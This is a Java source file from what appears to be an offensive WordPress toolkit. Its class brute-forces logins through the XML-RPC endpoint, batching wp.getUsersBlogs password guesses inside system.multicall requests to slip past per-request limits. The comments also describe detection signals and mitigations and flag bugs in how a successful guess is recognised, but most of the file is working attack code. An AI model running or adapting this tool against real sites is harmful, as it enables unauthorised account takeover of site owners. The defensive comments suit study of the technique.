package org.pwnpress.bruteforce;

import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Iterator;
import java.util.List;
import java.util.Scanner;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.concurrent.atomic.AtomicInteger;
import org.pwnpress.framework.WPFrameworkSettings;
import org.pwnpress.utils.HttpRequest;

/* loaded from: input_file:org/pwnpress/bruteforce/XmlRpcBruteforce.class */
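/**
 * Interactive credential-guessing routine against a WordPress XML-RPC endpoint.
 *
 * <p>What the code does, as visible in this class: it reads a target URL and a
 * comma-separated username list from stdin, probes {@code /xmlrpc.php} with
 * {@code system.listMethods}, then sends {@code system.multicall} requests that
 * each wrap up to {@link #BATCH_SIZE} {@code wp.getUsersBlogs} calls (one
 * username/password pair per call), sleeping one second between batches.
 *
 * <p>Defensive reading: one HTTP POST carries several login guesses, so controls
 * that count HTTP requests see fewer events than guesses made. The observable
 * signal is repeated POSTs to {@code /xmlrpc.php} whose body contains
 * {@code system.multicall} together with multiple {@code wp.getUsersBlogs}
 * entries. Typical mitigations are disabling XML-RPC where it is unused,
 * rejecting {@code system.multicall} at the edge, and throttling on
 * authentication attempts rather than on requests. WordPress core also fails
 * the remaining calls in a request once one authentication in it has failed,
 * which limits this batching on current installs.
 *
 * <p>Thread-safety: all state is static and shared between the calling thread
 * and the daemon listener thread started by {@link #startUserInputListener()}.
 * The stop flag and counters are never reset, so they persist across calls to
 * {@link #xmlrpcBrute()} within one JVM.
 */
public class XmlRpcBruteforce {
    private static final String XMLRPC_ENDPOINT = "/xmlrpc.php";
    /** Number of passwords wrapped into a single system.multicall request. */
    private static final int BATCH_SIZE = 4;
    /** Outer system.multicall envelope; %s receives the concatenated per-call structs. */
    private static final String XMLRPC_PAYLOAD_TEMPLATE = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>system.multicall</methodName>\n  <params>\n    <param>\n      <value>\n        <array>\n          <data>\n            %s\n          </data>\n        </array>\n      </value>\n    </param>\n  </params>\n</methodCall>\n";
    /** One wp.getUsersBlogs call; the two %s slots are username and password, in that order. */
    private static final String METHOD_PAYLOAD_TEMPLATE = "    <value>\n      <struct>\n        <member>\n          <name>methodName</name>\n          <value>wp.getUsersBlogs</value>\n        </member>\n        <member>\n          <name>params</name>\n          <value>\n            <array>\n              <data>\n                <value>%s</value>\n                <value>%s</value>\n              </data>\n            </array>\n          </value>\n        </member>\n      </struct>\n    </value>\n";
    private static final AtomicBoolean stopBruteforce = new AtomicBoolean(false);
    private static final AtomicInteger requestCounter = new AtomicInteger(0);
    private static final AtomicInteger passwordCounter = new AtomicInteger(0);
    // Both flags are toggled by the listener thread; debugMode is read by the
    // worker thread, so they are volatile to make the toggle visible there.
    private static volatile boolean debugMode = false;
    private static volatile boolean verboseMode = true;

    /**
     * Entry point: prompts for target and usernames, verifies the endpoint,
     * loads the configured wordlist and runs the guessing loop.
     *
     * <p>Returns without sending login attempts when the probe fails or the
     * wordlist is empty.
     */
    public static void xmlrpcBrute() {
        // NOTE(review): the listener thread opens a second Scanner on System.in;
        // two buffering readers on one stream can each consume the other's input.
        Scanner scanner = new Scanner(System.in);
        System.out.print("Enter target website URL (e.g., https://example.com): ");
        String targetUrl = scanner.nextLine().trim();
        System.out.print("Enter usernames (comma-separated): ");
        String usernames = scanner.nextLine().trim();
        if (!isXmlRpcEnabled(targetUrl)) {
            System.out.println("[-] XML-RPC is not enabled on this target. Aborting.");
            return;
        }
        System.out.println("[+] XML-RPC is enabled. Starting brute-force attack...");
        System.out.println("    Press [s] for status, [q] to quit brute force, [v] to toggle verbose output, [d] to toggle debug info.");
        List<String> passwords = loadPasswordList();
        if (passwords.isEmpty()) {
            System.out.println("[-] No passwords found in wordlist. Exiting.");
        } else {
            startUserInputListener();
            bruteForce(targetUrl, usernames, passwords);
        }
    }

    /**
     * Probes the endpoint with {@code system.listMethods}.
     *
     * @param str base URL of the target, without the endpoint path
     * @return {@code true} only when the response code is 200 and the body
     *     contains the string {@code wp.getUsersBlogs}; {@code false} otherwise,
     *     including on any {@link IOException}
     */
    private static boolean isXmlRpcEnabled(String str) {
        try {
            HttpURLConnection connection = HttpRequest.postRequest(str + XMLRPC_ENDPOINT, "<methodCall><methodName>system.listMethods</methodName></methodCall>");
            int responseCode = connection.getResponseCode();
            String body = HttpRequest.readResponse(connection);
            return responseCode == 200 && body.contains("wp.getUsersBlogs");
        } catch (IOException e) {
            System.err.println("Error checking XML-RPC: " + e.getMessage());
            return false;
        }
    }

    /**
     * Iterates usernames and password batches until a pair is reported valid,
     * the stop flag is set, or the lists are exhausted.
     *
     * @param str base URL of the target
     * @param str2 comma-separated usernames; blank entries are skipped
     * @param list passwords to try, consumed {@link #BATCH_SIZE} at a time
     */
    private static void bruteForce(String str, String str2, List<String> list) {
        for (String rawUsername : str2.split(",")) {
            String username = rawUsername.trim();
            if (username.isEmpty()) {
                continue;
            }
            System.out.println("[*] Testing username: " + username);
            for (int i = 0; i < list.size(); i += BATCH_SIZE) {
                if (stopBruteforce.get()) {
                    System.out.println("[*] Brute force stopped by user.");
                    return;
                }
                List<String> batch = list.subList(i, Math.min(i + BATCH_SIZE, list.size()));
                if (attemptLogin(str, username, batch)) {
                    // A batch-level hit does not say which entry matched, so
                    // each password of the batch is re-sent on its own.
                    for (String candidate : batch) {
                        if (attemptLogin(str, username, Collections.singletonList(candidate))) {
                            System.out.println("[!] Valid credentials found: " + username + " : " + candidate);
                            return;
                        }
                    }
                } else {
                    System.out.println("[+] Trying passwords: " + batch);
                }
                // Counts one request per batch; the single-password re-sends
                // above are not included in this counter.
                requestCounter.incrementAndGet();
                passwordCounter.addAndGet(batch.size());
                try {
                    Thread.sleep(1000L);
                } catch (InterruptedException e) {
                    // Restore the flag and stop: carrying on with the interrupt
                    // set would make every later sleep() throw immediately and
                    // silently remove the one-second pause between requests.
                    Thread.currentThread().interrupt();
                    return;
                }
            }
        }
        System.out.println("[-] No valid credentials found.");
    }

    /**
     * Sends one multicall request for {@code str2} with the given passwords and
     * classifies the response by substring match.
     *
     * @param str base URL of the target
     * @param str2 username placed in every call of the batch
     * @param list passwords for this request
     * @return {@code true} when the response body contains the
     *     "Insufficient arguments" string and {@code list} is non-empty;
     *     {@code false} otherwise, including on any {@link IOException}
     */
    private static boolean attemptLogin(String str, String str2, List<String> list) {
        try {
            HttpURLConnection connection = HttpRequest.postRequest(str + XMLRPC_ENDPOINT, craftPayload(str2, list));
            connection.getResponseCode();
            String body = HttpRequest.readResponse(connection);
            if (debugMode) {
                // NOTE(review): this prints the raw server response to stdout.
                System.out.println("[DEBUG] Response for " + str2 + ": " + body);
            }
            if (body.contains("Insufficient arguments passed to this XML-RPC method.") || body.contains("<value>true</value>")) {
                // NOTE(review): the condition inside the loop does not depend on
                // the loop variable, so the message below always names the first
                // entry of the batch, and a body holding only "<value>true</value>"
                // falls through to false. Kept as in the original.
                for (String password : list) {
                    if (body.contains("Insufficient arguments passed to this XML-RPC method.")) {
                        System.out.println("[!] Valid credentials found: " + str2 + " : " + password);
                        return true;
                    }
                }
            }
            return false;
        } catch (IOException e) {
            System.err.println("Error connecting to " + str + ": " + e.getMessage());
            return false;
        }
    }

    /**
     * Builds the system.multicall body: one {@code wp.getUsersBlogs} struct per
     * password, all sharing the same username.
     *
     * @param str username
     * @param list passwords
     * @return the complete XML request body
     */
    private static String craftPayload(String str, List<String> list) {
        StringBuilder calls = new StringBuilder();
        for (String password : list) {
            calls.append(String.format(METHOD_PAYLOAD_TEMPLATE, str, password));
        }
        return String.format(XMLRPC_PAYLOAD_TEMPLATE, calls.toString());
    }

    /**
     * Reads the wordlist whose path comes from
     * {@code WPFrameworkSettings.getXmlrpcBruteforcePasswordsWordlist()}.
     *
     * @return the trimmed lines of the file in order (blank lines are kept as
     *     empty strings); an empty or partial list when the path is unset or
     *     reading fails
     */
    private static List<String> loadPasswordList() {
        List<String> passwords = new ArrayList<>();
        String wordlistPath = WPFrameworkSettings.getXmlrpcBruteforcePasswordsWordlist();
        if (wordlistPath == null || wordlistPath.isEmpty()) {
            System.err.println("[-] Error: Password wordlist file is not set.");
            return passwords;
        }
        // try-with-resources closes the reader even when readLine() throws;
        // the previous form only closed it on the success path.
        try (BufferedReader reader = new BufferedReader(new FileReader(wordlistPath))) {
            String line;
            while ((line = reader.readLine()) != null) {
                passwords.add(line.trim());
            }
        } catch (IOException e) {
            System.err.println("[-] Error reading password wordlist: " + e.getMessage());
        }
        return passwords;
    }

    /**
     * Starts a daemon thread that reads single-letter commands from stdin:
     * {@code s} prints counters, {@code q} sets the stop flag and ends the
     * thread, {@code v} and {@code d} toggle the verbose and debug flags.
     */
    private static void startUserInputListener() {
        Thread listener = new Thread(() -> {
            Scanner scanner = new Scanner(System.in);
            // hasNextLine() ends the loop cleanly when stdin is closed instead of
            // letting nextLine() throw NoSuchElementException on this thread.
            while (!stopBruteforce.get() && scanner.hasNextLine()) {
                String command = scanner.nextLine().trim().toLowerCase();
                if (command.equals("s")) {
                    System.out.println("[STATUS] Requests Sent: " + requestCounter.get() + " | Passwords Tested: " + passwordCounter.get());
                } else if (command.equals("q")) {
                    stopBruteforce.set(true);
                    System.out.println("[*] Stopping brute-force attack...");
                    return;
                } else if (command.equals("v")) {
                    verboseMode = !verboseMode;
                    System.out.println("[*] Verbose mode: " + (verboseMode ? "Enabled" : "Disabled"));
                } else if (command.equals("d")) {
                    debugMode = !debugMode;
                    System.out.println("[*] Debug mode: " + (debugMode ? "Enabled" : "Disabled"));
                }
            }
        });
        listener.setDaemon(true);
        listener.start();
    }
}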
